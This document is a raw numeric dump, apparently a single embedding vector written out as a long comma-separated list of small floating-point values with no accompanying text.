0.03336774930357933, -0.013053586706519127, -0.024871330708265305, -0.021302834153175354, -0.001863418729044497, -0.015517547726631165, -0.03407835587859154, -0.022291509434580803, 0.009207027032971382, -0.02425340935587883, -0.016622081398963928, -0.005063092336058617, 0.0018479707650840282, 0.00008743826765567064, -0.022245164960622787, 0.006970923859626055, -0.005870251916348934, -0.005410673096776009, -0.008419176563620567, -0.001651973812840879, 0.00496654212474823, 0.0007574362680315971, -0.006631067488342524, 0.014467081055045128, 0.0032498794607818127, 0.014328048564493656, -0.01720910705626011, 0.005692599341273308, 0.021982548758387566, -0.00417869258671999, 0.01836770959198475, 0.018583981320261955, -0.008133388124406338, 0.0023925139103084803, 0.021132906898856163, 0.011516507714986801, -0.023156598210334778, -0.013918676413595676, 0.0006058524595573545, -0.009075718000531197, -0.018027853220701218, 0.0188620463013649, 0.01589602418243885, -0.00722195440903306, -0.02002064883708954, 0.0014723904896527529, 0.02324928715825081, 0.013601991347968578, -0.04529362916946411, -0.0013072896981611848, -0.010288388468325138, -0.01051238551735878, 0.010187976993620396, -0.008426900953054428, -0.0003053399850614369, 0.0085659334436059, -0.013787368312478065, -0.005329570733010769, 0.03676631301641464, -0.025643732398748398, -0.008048424497246742, -0.027528392150998116, -0.00730691896751523, -0.0059629399329423904, 0.032657139003276825, 0.010697761550545692, 0.005580601282417774, 0.009709087200462818, 0.0022727916948497295, -0.006310520693659782, -0.019310038536787033, -0.008056147955358028, 0.005800735671073198, -0.021318282932043076, 0.03213190659880638, 0.001466597430408001, 0.0003190983843524009, -0.008712689392268658, 0.005260054487735033, 0.002095139119774103, -0.016931042075157166, 0.017008282244205475, -0.013038137927651405, -0.012613317929208279, -0.015332170762121677, 0.007669947575777769, -0.022492334246635437, 0.007113818544894457, 0.003246017498895526, -0.003919938113540411, 0.04334717616438866, 0.00018754875054582953, -0.009114338085055351, 0.005924319848418236, -0.003657321445643902, -0.04096817970275879, -0.0028096106834709644, 0.0025489251129329205, -0.018444949761033058, -0.0029602290596812963, 0.019155558198690414, -0.00459578912705183, -0.026786886155605316, 0.013215790502727032, -0.010890861973166466, -0.013856884092092514, 0.023650934919714928, -0.023635488003492355, -0.0030297450721263885, 0.022476885467767715, 0.001223290921188891, 0.03069523721933365, 0.016158640384674072, 0.003193880431354046, 0.03410925343632698, -0.026184413582086563, -0.022538676857948303, 0.015015486627817154, 0.005955216009169817, 0.012134428136050701, -0.02053043432533741, -0.021812619641423225, -0.031328607350587845, -0.0026531992480158806, -0.014536597765982151, 0.010481488890945911, 0.0034371870569884777, -0.005317984614521265, -0.00662334356456995, -0.0032633966766297817, -0.01728634722530842, -0.014289428479969501, -0.024145273491740227, -0.011261614970862865, 0.010867689736187458, 0.004225036595016718, 0.0005493705975823104, -0.0012184634106233716, -0.021997995674610138, -0.0010871551930904388, 0.017842475324869156, 0.016853801906108856, 0.012482008896768093, 0.0006777823437005281, -0.015594787895679474, -0.006924579851329327, -0.003068365156650543, 0.0009413643856532872, -0.012312080711126328, -0.036889899522066116, 0.03627197816967964, -0.012821866199374199, 0.008311040699481964, 0.0197116881608963, 0.01357881911098957, 0.012281185016036034, -0.0025605112314224243, -0.0052523305639624596, -0.023959895595908165, -0.030648894608020782, -0.016575736925005913, 0.0013623232953250408, -0.013880056329071522, 0.0022148615680634975, 0.0006159902550280094, -0.002471684943884611, 0.0013014966389164329, -0.015115898102521896, -0.023805415257811546, -0.02235330082476139, 0.019001077860593796, 0.001741765532642603, 0.009400127455592155, 0.0029196778777986765, -0.003049055114388466, -0.012914554215967655, 0.007754911668598652, 0.022971222177147865, -0.03503613546490669, -0.010234320536255836, -0.0017021798994392157, 0.0049626799300313, -0.0035762193147093058, 0.02184351533651352, 0.006090386305004358, 0.03163756802678108, -0.018753910437226295, -0.020252369344234467, 0.020499536767601967, 0.005171228665858507, 0.011856364086270332, 0.006673549301922321, -0.0036940104328095913, -0.032749827951192856, 0.011732779443264008, -0.011477887630462646, 0.014953694306313992, -0.014420737512409687, -0.01994340866804123, -0.008218352682888508, 0.002552787074819207, 0.004634409211575985, 0.03063344582915306, 0.024639610201120377, -0.01918645389378071, 0.025937244296073914, -0.0014945970615372062, -0.0010340525768697262, 0.012242564931511879, 0.01813598908483982, 0.013478407636284828, -0.0065306550823152065, 0.018970182165503502, -0.006673549301922321, 0.020298713818192482, -0.00806387234479189, -0.02037595398724079, 0.02607627585530281, -0.011083962395787239, 0.03444910794496536, 0.011709607206285, 0.019171006977558136, -0.0008559174602851272, 0.008210628293454647, -0.007820566184818745, -0.03234817832708359, -0.007071336265653372, -0.00934605859220028, -0.0014241153839975595, 0.02318749576807022, -0.004935645963996649, -0.008025252260267735, -0.04235850274562836, 0.022569574415683746, -0.004931783769279718, 0.023141151294112206, 0.0042211744002997875, 0.01703917793929577, 0.03923799842596054, 0.00848096888512373, 0.02094753086566925, 0.018398605287075043, 0.0008679862366989255, 0.01679201051592827, -0.007874634116888046, -0.023372871801257133, -0.009809499606490135, -0.0038291807286441326, -0.018661221489310265, -0.005418397020548582, -0.00007633499626535922, -0.006067214068025351, 0.01365605928003788, -0.00046923395711928606, -0.008048424497246742, -0.022492334246635437, 0.0016510083805769682, 0.0003181328938808292, -0.0063530029729008675, 0.015154518187046051, -0.003726837458088994, 0.004661443643271923, 0.011060790158808231, 0.002199413487687707, 0.0028347137849777937, 0.00869724154472351, 0.010527833364903927, -0.0007038509356789291, 0.017023731023073196, 0.021658139303326607, -0.032811619341373444, 0.04004129767417908, -0.0013381857424974442, 0.0072103687562048435, 0.01631312072277069, -0.005727357696741819, -0.014467081055045128, -0.004854543600231409, -0.02797638438642025, 0.011130306869745255, -0.011060790158808231, 0.006507483310997486, -0.016421256586909294, 0.0060054222121834755, -0.0036940104328095913, -0.005333432927727699, -0.00790552981197834, 0.001550596090964973, -0.020592225715517998, 0.005287088453769684, 0.009376955218613148, -0.020391400903463364, 0.03865097463130951, -0.00632983073592186, 0.027173087000846863, -0.0013999778311699629, 0.0036071152426302433, 0.004186416510492563, 0.013115378096699715, -0.004263656679540873, 0.004630547482520342, -0.0004501652729231864, 0.010157080367207527, 0.031668465584516525, 0.03296609967947006, -0.014760593883693218, 0.028269896283745766, 0.0247631948441267, -0.0028984369710087776, 0.003085744334384799, -0.0011518438113853335, 0.005109436344355345, 0.003340636845678091, 0.02474774606525898, -0.005584463477134705, -0.01238159742206335, -0.01952631212770939, 0.007388020865619183, -0.004418137017637491, 0.0073030567727983, -0.002593338256701827, 0.0018750048475340009, 0.028347136452794075, 0.006750789470970631, 0.00740733090788126, -0.013022690080106258, -0.0021511383820325136, -0.017502618953585625, -0.0029467118438333273, 0.0014559769770130515, 0.013872331939637661, -0.010288388468325138, -0.013493855483829975, -0.001985071925446391, -0.00033840842661447823, -0.002587545197457075, 0.008728137239813805, -0.02020602487027645, -0.003854283830150962, -0.00661948136985302, -0.00614445423707366, -0.0025856143329292536, -0.023403767496347427, -0.0073262290097773075, 0.005796873942017555, 0.014567493461072445, 0.0009896395495161414, 0.014930522069334984, -0.022059788927435875, 0.004951093811541796, -0.015216310508549213, 0.004128486383706331, 0.013493855483829975, -0.0013748747296631336, 0.0008564002346247435, -0.00038475252222269773, -0.006519068963825703, -0.008998477831482887, -0.0022380335722118616, 0.01431260071694851, -0.008473245427012444, -0.007955736480653286, -0.01821322925388813, -0.008650897070765495, 0.008882617577910423, -0.026338893920183182, 0.0017919716192409396, -0.00379635370336473, 0.015154518187046051, 0.005236882716417313, -0.009322887286543846, 0.012636489234864712, 0.008635449223220348, -0.004371793009340763, 0.015085002407431602, 0.007689257618039846, 0.0012976346770301461, -0.006314382888376713, -0.004425860941410065, -0.012698281556367874, 0.0025663042906671762, -0.013972744345664978, 0.0063568647019565105, -0.01861487701535225, -0.0027980245649814606, -0.004445170983672142, -0.012930002063512802, 0.004943369887769222, -0.00985584408044815, 0.022538676857948303, 0.007785807829350233, -0.007426640950143337, -0.0020410711877048016, -0.00025634077610448003, -0.023635488003492355, 0.02020602487027645, -0.00219555152580142, -0.020422296598553658, -0.002539270091801882, 0.0005469568422995508, 0.005348880775272846, -0.027003157883882523, -0.0198507197201252, -0.0004926473484374583, -0.018815701827406883, -0.01977347955107689, -0.007781945634633303, 0.003587805200368166, 0.011230718344449997, -0.008233800530433655, 0.011416095308959484, -0.008457796648144722, -0.0069786482490599155, 0.005816183984279633, 0.0012348770396783948, 0.009376955218613148, 0.01116892695426941, -0.02077760174870491, -0.011277062818408012, 0.005920458119362593, -0.01880025491118431, -0.0027806456200778484, -0.0008004010887816548, -0.00019285902089904994, -0.021333731710910797, 0.0022669986356049776, 0.00583549402654171, 0.0032595344819128513, -0.03302789106965065, 0.014559769071638584, 0.01381826400756836, 0.011655539274215698, 0.013277582824230194, 0.017595307901501656, 0.0031513983849436045, 0.017502618953585625, -0.006484311074018478, 0.003199673490598798, 0.007820566184818745, -0.002402168931439519, 0.03247176110744476, 0.009570055641233921, 0.013045862317085266, -0.010272940620779991, 0.018723014742136, -0.009716811589896679, 0.004920198116451502, 0.0015399756375700235, -0.004186416510492563, 0.004773441702127457, -0.002483271062374115, -0.0022418955340981483, -0.0021105872001498938, -0.002904229797422886, 0.0051480564288794994, 0.02136462740600109, -0.01904742233455181, 0.0017050764290615916, 0.0033753947354853153, -0.0019725204911082983, -0.003873593872413039, -0.01022659707814455, 0.012111256830394268, 0.01921735145151615, -0.006082662381231785, -0.01895473338663578, -0.009801776148378849, 0.005410673096776009, 0.0009963980410248041, 0.017255451530218124, 0.00355884013697505, -0.011230718344449997, 0.0005126815522089601, 0.0032440866343677044, 0.002031416166573763, -0.0012754281051456928, 0.006607895251363516, 0.005677151493728161, 0.008002080023288727, -0.013432063162326813, 0.002848230767995119, -0.007924839854240417, 0.02550469897687435, -0.009407850913703442, 0.01171733159571886, -0.005866389721632004, -0.0053681908175349236, -0.01116892695426941, -0.005742805544286966, -0.0007506777765229344, -0.007886219769716263, 0.021395523101091385, 0.008102492429316044, 0.009585503488779068, -0.01573381945490837, -0.019819824025034904, -0.005735081620514393, -0.004765717778354883, 0.005236882716417313, -0.017085522413253784, 0.009485091082751751, 0.015123622491955757, -0.008164284750819206, 0.00653837900608778, -0.048723090440034866, -0.005453154910355806, 0.012250288389623165, -0.006789409555494785, 0.0053257085382938385, 0.017579859122633934, -0.008620001375675201, 0.0017803856171667576, -0.0036148393992334604, -0.01316172257065773, 0.01747172325849533, 0.009801776148378849, 0.009824947454035282, -0.0007535742479376495, -0.002645475324243307, 0.02226061373949051, -0.0021685173269361258, 0.005619221366941929, -0.004854543600231409, 0.009006202220916748, 0.02507215552031994, -0.004734821617603302, -0.012736901640892029, 0.0014762524515390396, -0.025720972567796707, -0.0171318668872118, 0.0071099563501775265, -0.009446470998227596, -0.03200832009315491, 0.008836274035274982, -0.013594267889857292, -0.031575776636600494, -0.026678750291466713, -0.01245883759111166, 0.01021887268871069, 0.014189017005264759, -0.0033425677102059126, 0.043316278606653214, -0.003653459483757615, -0.000022251802874961868, 0.007156300358474255, 0.0009693639585748315, -0.02087029069662094, 0.004846819676458836, -0.012566973455250263, 0.03929978981614113, -0.00835738517343998, -0.0018943147733807564, -0.018985630944371223, 0.0060401801019907, 0.0038986969739198685, -0.010002600029110909, 0.0010166735155507922, -0.025968139991164207, 0.02020602487027645, -0.010265217162668705, 0.01880025491118431, 0.0015264585381373763, 0.008226077072322369, 0.022152476012706757, 0.004796613473445177, -0.0018315572524443269, -0.004711649380624294, 0.006461138837039471, -0.026508821174502373, -0.0007482640212401748, -0.00877448171377182, 0.01853763684630394, 0.001880797790363431, 0.020314160734415054, 0.016853801906108856, -0.0001512217422714457, -0.03398566693067551, -0.023403767496347427, 0.0023635488469153643, 0.012072636745870113, -0.002205206546932459, 0.04371792823076248, -0.01461383793503046, -0.004348620772361755, 0.005422258749604225, 0.017409931868314743, -0.008658621460199356, 0.005240744445472956, -0.019603552296757698, 0.01646760106086731, -0.012651938013732433, -0.008975306525826454, 0.02301756665110588, 0.023712728172540665, -0.002697612391784787, 0.007955736480653286, 0.009114338085055351, 0.009709087200462818, -0.010327008552849293, 0.011524231173098087, 0.01150105893611908, -0.009624123573303223, -0.008249248377978802, -0.004951093811541796, -0.020823946222662926, -0.0010060530621558428, 0.0002524787560105324, -0.003114709397777915, -0.015563891269266605, -0.013223514892160892, -0.006700583733618259, 0.003415945917367935, -0.0032209143973886967, 0.009801776148378849, 0.00898302998393774, 0.0014723904896527529, 0.01279096957296133, 0.0001735489786369726, -0.0008843998075462878, 0.0026126482989639044, -0.0033831188920885324, -0.027373911812901497, -0.00438337866216898, 0.007890081964433193, 0.00007416262087645009, -0.004815923515707254, 0.02814631350338459, 0.022245164960622787, -0.015208587050437927, 0.005418397020548582, -0.0011711538536474109, 0.004649857524782419, -0.008087044581770897, 0.004321586806327105, -0.01158602349460125, 0.007658361457288265, -0.01720910705626011, 0.02077760174870491, -0.023697279393672943, -0.013308478519320488, 0.004537859000265598, -0.0012850831262767315, -0.01631312072277069, -0.01887749508023262, 0.012474285438656807, -0.014621561393141747, -0.02051498554646969, -0.01912466250360012, 0.017348138615489006, -0.0038986969739198685, -0.015386238694190979, 0.02947484329342842, -0.009585503488779068, -0.0024002378340810537, -0.010504661127924919, -0.01703917793929577, -0.008218352682888508, 0.0011180512374266982, -0.009631847031414509, 0.004533997271209955, 0.009338335134088993, -0.009948532097041607, 0.005746667739003897, 0.00919157825410366, 0.007890081964433193, -0.0038678008131682873, -0.019510863348841667, -0.006465001031756401, 0.006812581792473793, 0.003398566972464323, 0.013408890925347805, 0.028439825400710106, -0.018475845456123352, 0.0027690595015883446, -0.002917747013270855, -0.016822906211018562, -0.0026589923072606325, -0.017518067732453346, -0.008009804412722588, 0.015772439539432526, 0.02324928715825081, 0.004039660096168518, 0.0012580490438267589, -0.0009041925659403205, -0.001843143254518509, 0.010705485939979553, -0.017734339460730553, -0.023233838379383087, 0.006090386305004358, 0.0052523305639624596, 0.017765235155820847, -0.0015003900043666363, -0.0035279442090541124, -0.009693639352917671, -0.0199588555842638, 0.0014588735066354275, 0.01929459162056446, -0.005870251916348934, 0.001663559814915061, -0.009214750491082668, 0.019093766808509827, 0.006654239259660244, 0.028254449367523193, 0.026956815272569656, 0.010234320536255836, -0.019140111282467842, -0.005487913265824318, 0.007704705465584993, -0.0003864421450998634, 0.004213450476527214, -0.017100971192121506, -0.022801294922828674, 0.023202942684292793, 0.01705462671816349, 0.003415945917367935, 0.008581381291151047, -0.018970182165503502, -0.004039660096168518, 0.025149395689368248, 0.024979466572403908, 0.029768357053399086, -0.0035221511498093605, -0.017734339460730553, 0.01469107810407877, -0.0042173126712441444, -0.01986616849899292, -0.0178733728826046, -0.014644733630120754, 0.013354822993278503, 0.00876675732433796, 0.008704965934157372, -0.0009524676715955138, -0.006808719597756863, -0.006789409555494785, -0.02127193845808506, -0.0013671508058905602, -0.02284763753414154, -0.02192075550556183, -0.01846039667725563, -0.006387760862708092, 0.006631067488342524, 0.01581878401339054, 0.02068491466343403, -0.015764715149998665, 0.006152178626507521, 0.008002080023288727, 0.0012059119762852788, -0.012767798267304897, 0.009307438507676125, 0.005669427569955587, -0.012142152525484562, -0.004700063727796078, -0.010968102142214775, -0.016529394313693047, 0.0009432954248040915, -0.0015747336437925696, 0.0018325226847082376, 0.014837834052741528, -0.008295592851936817, 0.012482008896768093, -0.004441308788955212, 0.001553492620587349, -0.0221833735704422, -0.01764165237545967, -0.009894464164972305, -0.00906799454241991, 0.002014036988839507, 0.03676631301641464, -0.01728634722530842, -0.003836904652416706, -0.008202904835343361, 0.00761587917804718, 0.016251329332590103, -0.004406550899147987, 0.0006628170958720148, 0.0063568647019565105, -0.030757030472159386, 0.006580861285328865, -0.01394184771925211, -0.002881057793274522, -0.0024388579186052084, 0.009299715049564838, -0.014328048564493656, -0.018815701827406883, 0.016591185703873634, 0.012937726452946663, 0.010890861973166466, 0.013107654638588428, 0.0001515838084742427, 0.003647666424512863, -0.024052584543824196, -0.019340934231877327, -0.02539656311273575, -0.0099794277921319, -0.0035800812765955925, -0.013609715737402439, -0.010157080367207527, 0.00943102315068245, -0.013679231517016888, -0.0022129304707050323, -0.019248247146606445, 0.023202942684292793, 0.001901073381304741, 0.0337693952023983, -0.0022940326016396284, 0.01216532476246357, -0.0047425455413758755, -0.0012619110057130456, -0.03305878862738609, -0.010914034210145473, -0.0047773034311831, -0.030818821862339973, -0.00449151499196887, 0.0124511132016778, -0.007245126646012068, -0.013764196075499058, 0.018985630944371223, 0.014165844768285751, -0.007866909727454185, 0.019402727484703064, 0.0066426536068320274, -0.022461436688899994, -0.008396005257964134, 0.009415575303137302, 0.009152958169579506, -0.020314160734415054, 0.024562370032072067, -0.00868951715528965, 0.005321846809238195, -0.01337027084082365, 0.0037500096950680017, -0.016745666041970253, -0.03512882441282272, -0.01994340866804123, -0.01887749508023262, -0.00614831643179059, -0.020468641072511673, -0.002419547876343131, -0.006600171327590942, 0.01654484122991562, 0.012427940964698792, 0.011864087544381618, 0.002546994248405099, -0.003906420897692442, 0.013254410587251186, 0.0029834010638296604, -0.00690913200378418, 0.00885944627225399, -0.012227117083966732, -0.011307958513498306, -0.007886219769716263, -0.028903266414999962, 0.023125702515244484, -0.010087564587593079, 0.0034101528581231833, -0.012111256830394268, -0.004680753685534, 0.0031185713596642017, -0.010442868806421757, 0.006217832677066326, 0.0250103622674942, 0.003344498807564378, -0.018753910437226295, 0.004476067144423723, 0.002852092729881406, 0.018831150606274605, 0.01021887268871069, 0.006376174744218588, 0.006561551243066788, -0.008681793697178364, -0.011338855139911175, -0.011253890581429005, 0.022878535091876984, 0.01705462671816349, -0.004298414569348097, -0.011941327713429928, 0.0025894762948155403, -0.016081400215625763, 0.02881057746708393, 0.0005942664574831724, 0.006750789470970631, -0.022368749603629112, 0.0006951614050194621, 0.01605050452053547, 0.007079060189425945, -0.0099794277921319, -0.00701726833358407, 0.010952654294669628, 0.007689257618039846, -0.007144714239984751, -0.0022476885933429003, 0.019742583855986595, 0.0010321215959265828, 0.003334843786433339, 0.00399717828258872, 0.016096848994493484, 0.006549965124577284, 0.004333172924816608, -0.005758253857493401, -0.015664303675293922, 0.01150105893611908, 0.0053681908175349236, -0.0036129083018749952, -0.01895473338663578, -0.024716850370168686, -0.004182554315775633, 0.0224305409938097, 0.0005585429025813937, -0.0075193289667367935, -0.006171488668769598, -0.001814178191125393, 0.014474805444478989, 0.018661221489310265, 0.00014023916446603835, 0.020005200058221817, -0.0043795169331133366, 0.00575052946805954, 0.0099794277921319, -0.00007470571290468797, 0.009091166779398918, -0.01238159742206335, -0.014219912700355053, -0.016622081398963928, 0.00023063427943270653, -0.012621041387319565, -0.005387500859797001, -0.010612796992063522, 0.0016944559756666422, -0.013177170418202877, 0.018414054065942764, -0.02267771027982235, 0.005549705121666193, 0.010288388468325138, -0.00926881842315197, -0.008032976649701595, -0.02192075550556183, -0.006190798711031675, 0.010790449567139149, -0.015772439539432526, 0.02417616918683052, -0.020576776936650276, -0.01796605996787548, 0.034294627606868744, 0.015579339116811752, -0.008905789814889431, -0.0035433920565992594, -0.004788889549672604, -0.015069554559886456, -0.005793011747300625, -0.002784507581964135, 0.004506963305175304, 0.029752908274531364, 0.0027536116540431976, -0.0207003615796566, -0.005885699763894081, -0.012103532440960407, -0.028254449367523193, 0.01523175835609436, 0.032811619341373444, -0.0394233763217926, 0.008596829138696194, 0.01402681227773428, -0.027667423710227013, 0.008125664666295052, -0.00806387234479189, -0.017348138615489006, -0.011331130750477314, 0.02136462740600109, -0.011107134632766247, 0.0026242344174534082, 0.0030471242498606443, 0.0012831521453335881, 0.0006130937254056334, -0.013231238350272179, -0.01870756596326828, -0.0009365368750877678, -0.00044413088471628726, -0.005240744445472956, -0.00001581009382789489, -0.002419547876343131, 0.024376993998885155, -0.009176130406558514, 0.055829185992479324, 0.0017639721045270562, 0.02433064952492714, 0.009523711167275906, -0.010466041043400764, -0.002475546905770898, 0.02077760174870491, -0.0003427531919442117, -0.013648335821926594, 0.00947736669331789, 0.006171488668769598, -0.0030239520128816366, 0.00898302998393774, -0.0049626799300313, -0.017827028408646584, -0.0014154259115457535, -0.0034989791456609964, -0.028764234855771065, -0.007330090738832951, 0.018414054065942764, 0.026956815272569656, 0.020406849682331085, -0.021828068420290947, -0.010790449567139149, 0.012064912356436253, 0.036951690912246704, 0.019665343686938286, 0.023697279393672943, -0.012644213624298573, -0.006785547826439142, -0.012937726452946663, -0.009454195387661457, 0.0017774890875443816, 0.007098370231688023, 0.017085522413253784, 0.018259573727846146, -0.0103501807898283, 0.01863032579421997, 0.013231238350272179, -0.006248728837817907, 0.02657061442732811, -0.010064392350614071, 0.014420737512409687, -0.009199302643537521, 0.009508263319730759, 0.009183854795992374, 0.010157080367207527, -0.01671477034687996, 0.00027034053346142173, -0.007140852510929108, -0.012590145692229271, 0.0027227154932916164, -0.002394444774836302, -0.012196220457553864, 0.00395276490598917, 0.004912473727017641, 0.010473765432834625, 0.002819265704602003, -0.01680745743215084, 0.013517027720808983, 0.02003609575331211, 0.00964729581028223, 0.00023111702466849238, -0.0006198522751219571, 0.006244866643100977, 0.0035511162132024765, -0.01912466250360012, -0.016761112958192825, -0.011949052102863789, 0.022909430786967278, -0.014049984514713287, 0.012420217506587505, 0.034480005502700806, 0.015146794728934765, -0.008457796648144722, 0.009400127455592155, 0.009917636401951313, 0.007252850569784641, 0.019310038536787033, 0.004607375245541334, -0.015285827219486237, 0.006260314490646124, 0.0012010844657197595, 0.006140592508018017, 0.00428296672180295, -0.0181205403059721, 0.015247207134962082, -0.011362027376890182, -0.0024214789737015963, 0.0198507197201252, -0.013432063162326813, -0.007426640950143337, -0.0032884995453059673, -0.00048540611169300973, 0.009400127455592155, 0.014984590001404285, -0.011864087544381618, 0.011362027376890182, 0.005518808960914612, 0.0010842586634680629, 0.0009109511156566441, -0.0012686696136370301, 0.003300085663795471, 0.010998997837305069, -0.003450704040005803, 0.0019947269465774298, 0.0025547181721776724, -0.011578299105167389, 0.013300755061209202, -0.011964499950408936, -0.0061251441948115826, -0.022044340148568153, -0.005565153434872627, -0.0021086563356220722, 0.004321586806327105, -0.007183334324508905, 0.023156598210334778, 0.0002393237955402583, 0.02797638438642025, -0.00782828964293003, 0.017409931868314743, -0.01690014638006687, 0.014915074221789837, 0.00661948136985302, -0.03908351808786392, 0.008202904835343361, 0.01747172325849533, 0.001707007410004735, 0.0024098928552120924, -0.011446991004049778, -0.020545881241559982, 0.00935378298163414, 0.01121527049690485, -0.018522189930081367, 0.005410673096776009, -0.015795612707734108, 0.01920190267264843, 0.013517027720808983, 0.01432032510638237, 0.002882988890632987, -0.007669947575777769, 0.020654017105698586, -0.02209068462252617, -0.005866389721632004, 0.007187196519225836, 0.036550041288137436, -0.041431620717048645, 0.0007424710202030838, -0.010975826531648636, 0.02425340935587883, -0.010002600029110909, -0.010327008552849293, 0.019248247146606445, -0.006271900609135628, -0.020066993311047554, -0.017440827563405037, -0.0038098706863820553, 0.00799435656517744, 0.011446991004049778, 0.02053043432533741, 0.004236622713506222, 0.013872331939637661, 0.011864087544381618, -0.007380296941846609, 0.01013390813022852, 0.0010475695598870516, -0.008002080023288727, 0.002935125958174467, 0.0008544692536816001, 0.008218352682888508, -0.01402681227773428, -0.026029933243989944, -0.01055872905999422, -0.01663753017783165, 0.026045380160212517, 0.01753351464867592, 0.020298713818192482, -0.007353262975811958, -0.03169935941696167, 0.004526273347437382, -0.02862520143389702, -0.0002884436980821192, 0.010319285094738007, 0.03055620566010475, 0.007476847153156996, -0.010991274379193783, -0.005955216009169817, 0.007345539052039385, 0.013408890925347805, -0.006318244617432356, -0.00654224120080471, -0.01299951784312725, 0.009183854795992374, 0.012358425185084343, 0.013671508058905602, -0.015247207134962082, 0.017193658277392387, 0.01237387303262949, -0.012783246114850044, 0.001550596090964973, -0.011060790158808231, -0.011663263663649559, 0.0039855921640992165, -0.004225036595016718, -0.0041053141467273235, 0.0006193695007823408, -0.03809484466910362, 0.008813101798295975, 0.005429983139038086, -0.01946451887488365, 0.007449813187122345, -0.017270898446440697, -0.01178684737533331, -0.012783246114850044, 0.017518067732453346, 0.003916075918823481, 0.011825467459857464, 0.005588325206190348, -0.027852799743413925, 0.014861006289720535, -0.0025083741638809443, 0.010249768383800983, 0.007187196519225836, -0.01855308562517166, 0.015563891269266605, -0.014080880209803581, 0.01055872905999422, 0.005727357696741819, -0.012976346537470818, -0.006835754029452801, 0.002095139119774103, -0.011446991004049778, 0.009199302643537521, 0.009376955218613148, -0.011894984170794487, 0.0038562146946787834, 0.019603552296757698, 0.013014966621994972, 0.011145754717290401, 0.01415812037885189, -0.014675629325211048, -0.0013063241494819522, 0.0009075718116946518, -0.01754896342754364, 0.001208808389492333, -0.02368183247745037, -0.0011190167861059308, 0.002452374901622534, -0.009539159014821053, 0.002622303320094943, -0.01295317430049181, 0.009037097916007042, -0.002454305998980999, -0.01158602349460125, -0.0004296483821235597, -0.003948903176933527, -0.0024909949861466885, -0.004406550899147987, -0.005800735671073198, -0.011941327713429928, 0.00449151499196887, 0.0054261209443211555, -0.013146274723112583, 0.01022659707814455, -0.006974786054342985, 0.027018606662750244, -0.020314160734415054, 0.003537599230185151, 0.005777563899755478, 0.0005377845955081284, 0.014497977681457996, -0.015324447304010391, -0.018815701827406883, 0.022137029096484184, -0.01469107810407877, -0.010180252604186535, -0.005453154910355806, -0.009817223995923996, 0.030015524476766586, -0.012149876914918423, 0.014868729747831821, -0.01299951784312725, -0.009902187623083591, 0.005974526051431894, 0.014806938357651234, 0.0035974602214992046, 0.012960897758603096, 0.012551525607705116, -0.0037306996528059244, -0.00399717828258872, 0.0030606412328779697, -0.0027632666751742363, 0.014459357596933842, 0.012590145692229271, -0.018723014742136, 0.0020932082552462816, 0.006109696347266436, -0.009593226946890354, 0.019340934231877327, 0.0008930892799980938, 0.006986372172832489, 0.02043774537742138, -0.009747707284986973, -0.0013594267657026649, 0.011385198682546616, 0.009222474880516529, 0.00388904195278883, -0.0009273646282963455, 0.007202644366770983, 0.007032716181129217, 0.01539396308362484, 0.00035578745882958174, -0.007550225127488375, 0.008836274035274982, -0.012258012779057026, 0.0007159197120927274, 0.015509823337197304, 0.01042742095887661, 0.0031340194400399923, -0.004978128243237734, 0.012690558098256588, -0.013215790502727032, -0.01523175835609436, -0.009739983826875687, -0.006607895251363516, -0.015594787895679474, 0.006260314490646124, 0.00044919978245161474, 0.011555127799510956, 0.014413013122975826, 0.01390322856605053, -0.014165844768285751, -0.011122582480311394, -0.0005228192894719541, -0.006175350397825241, 0.013632887974381447, -0.022461436688899994, -0.005920458119362593, -0.014799213968217373, -0.002205206546932459, -0.011647815816104412, -0.0059050098061561584, -0.011825467459857464, -0.0031533294823020697, -0.012420217506587505, -0.0036071152426302433, -0.020885737612843513, 0.022399645298719406, 0.020962977781891823, -0.01315399818122387, 0.006360726896673441, 0.008797653950750828, 0.006893684156239033, -0.024376993998885155, 0.008426900953054428, -0.0154016874730587, 0.020128784701228142, 0.004792751744389534, -0.02640068531036377, -0.014675629325211048, 0.002610717201605439, -0.010164804756641388, -0.015224034897983074, 0.003332912689074874, -0.0022612055763602257, 0.02267771027982235, 0.01654484122991562, 0.0071176802739501, -0.0032054665498435497, 0.012180772610008717, 0.00449151499196887, 0.019387278705835342, 0.004236622713506222, -0.0027632666751742363, 0.012265737168490887, -0.0038755247369408607, -0.0047850278206169605, 0.0034815999679267406, 0.009570055641233921, 0.016591185703873634, 0.00038089053123258054, 0.01436666864901781, -0.008372833020985126, 0.004252070561051369, -0.014467081055045128, -0.0042752427980303764, -0.0008568830089643598, 0.011083962395787239, 0.008473245427012444, 0.018985630944371223, -0.018506741151213646, -0.003977868240326643, 0.01747172325849533, -0.0013990122824907303, -0.019634447991847992, -0.01265966147184372, 0.01113803032785654, -0.008426900953054428, -0.0063568647019565105, -0.002512236125767231, 0.0028694719076156616, -0.015030934475362301, -0.005406810902059078, -0.0062989345751702785, -0.004356344696134329, 0.01648304983973503, 0.020066993311047554, 0.004924059845507145, 0.02962932363152504, 0.046900223940610886, 0.0011566713219508529, -0.012134428136050701, -0.01937183178961277, 0.029613876715302467, -0.009021650068461895, 0.015911472961306572, -0.025365667417645454, -0.0017089385073632002, 0.004016488324850798, 0.00807159673422575, -0.0007497122860513628, 0.005619221366941929, 0.014266257174313068, 0.013200342655181885, -0.00011344647646183148, -0.003286568680778146, 0.004248208366334438, 0.019171006977558136, 0.00876675732433796, -0.003456497099250555, 0.006719893775880337, 0.007090646307915449, -0.011076238006353378, -0.008249248377978802, 0.003016228089109063, 0.020715810358524323, 0.0024736160412430763, 0.019588103517889977, 0.014080880209803581, 0.014250808395445347, -0.001628801808692515, 0.006283486727625132, -0.0012252220185473561, 0.001585354213602841, 0.006847339682281017, 0.016174089163541794, 0.002477478003129363, 0.01129251066595316, 0.0012532215332612395, -0.011562851257622242, -0.009183854795992374, 0.005634669214487076, -0.0028868508525192738, 0.022044340148568153, 0.0034082219935953617, -0.02159634791314602, 0.0011894983472302556, -0.01869211718440056, 0.013918676413595676, 0.01042742095887661, 0.002604924375191331, 0.011864087544381618, -0.025211187079548836, 0.022245164960622787, 0.03682810813188553, 0.012018567882478237, 0.014497977681457996, -0.00030413310742005706, 0.013347098603844643, -0.03633376955986023, -0.018321365118026733, 0.02630799636244774, -0.010110736824572086, 0.0063568647019565105, -0.00006806788587709889, -0.006395484786480665, -0.000030156850698404014, -0.007059750147163868, -0.002830851823091507, -0.008952134288847446, 0.01179457176476717, 0.0171318668872118, -0.03163756802678108, 0.012435665354132652, 0.00015266999253071845, -0.022693157196044922, 0.015293550677597523, 0.009168406948447227, 0.0052523305639624596, 0.004089866299182177, 0.002390582812950015, 